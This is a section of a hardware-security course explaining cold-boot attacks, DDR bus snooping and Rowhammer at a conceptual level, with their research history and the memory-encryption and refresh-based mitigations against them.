>
curriculum/Hardware Security
section 9 of 152 min read

9. Memory Attacks: Cold Boot, Bus Snoop, and Rowhammer

9.1 Cold-boot attacks: data after power-off

In 2008 Halderman et al. (Princeton) showed that DRAM does not lose its contents instantaneously when power is removed. The decay constant ranges from seconds at room temperature to minutes when the chips are cooled with canned air sprayed upside down (the propellant can chill DRAM to -50 °C). An attacker who steals a running laptop can power-cycle it into a custom memory-dump kernel and recover encryption keys from RAM before the bits decay. The defense is full-memory encryption (Apple T2, AMD SME, Intel TME) or hardware-backed key storage in TPM/TEE so the keys never sit in plaintext DRAM.

9.2 DDR bus snooping

DDR4 buses run at 2-3 GHz and are notoriously hard to snoop, but custom interposers (SPI-DDR adapter boards) and FPGA-based capture systems demonstrated in academic work can read traffic between CPU and DRAM. The defense is on-the-fly memory encryption with integrity (AMD SEV-SNP, Intel TME-MK), which makes the bus contents pseudorandom to a sniffer.

9.3 Rowhammer

DRAM cells leak charge over time and need refreshing. As cells shrink (sub-30 nm DDR3, sub-20 nm DDR4), neighboring cells couple electrically, and rapid activation of one row can flip bits in adjacent rows. Kim et al. 2014 named this Rowhammer and showed it was reproducible. Drammer (2016) weaponized Rowhammer on Android, escalating from unprivileged code to root by hammering specific physical pages until a bit flipped in a page-table entry, granting write access to kernel memory. Throwhammer (2018) showed Rowhammer over RDMA, no local code required. Half-Double (2021) showed multi-row Rowhammer that defeats some TRR (Target Row Refresh) defenses. Blacksmith (2022) found patterns that defeated all then-deployed TRR.

Mitigations:

  • TRR (Target Row Refresh). DRAM controllers proactively refresh rows that have been heavily activated. Defeated repeatedly.
  • ECC memory. Single-bit error correction; double-bit detect. Helps but not bulletproof.
  • Refresh-rate increase. Refresh every 32 ms instead of 64 ms. Energy cost.
  • DDR5 RFM (Refresh Management). First-class hammer-rate signaling between DRAM and controller. Helps, not perfect.

Rowhammer is the canonical example of physics escaping the abstraction. The DRAM specification said cells were independent. The shrinking process gave them coupling. The coupling was an attack channel. The defense is a continuous arms race between attackers finding patterns and DRAM vendors closing them.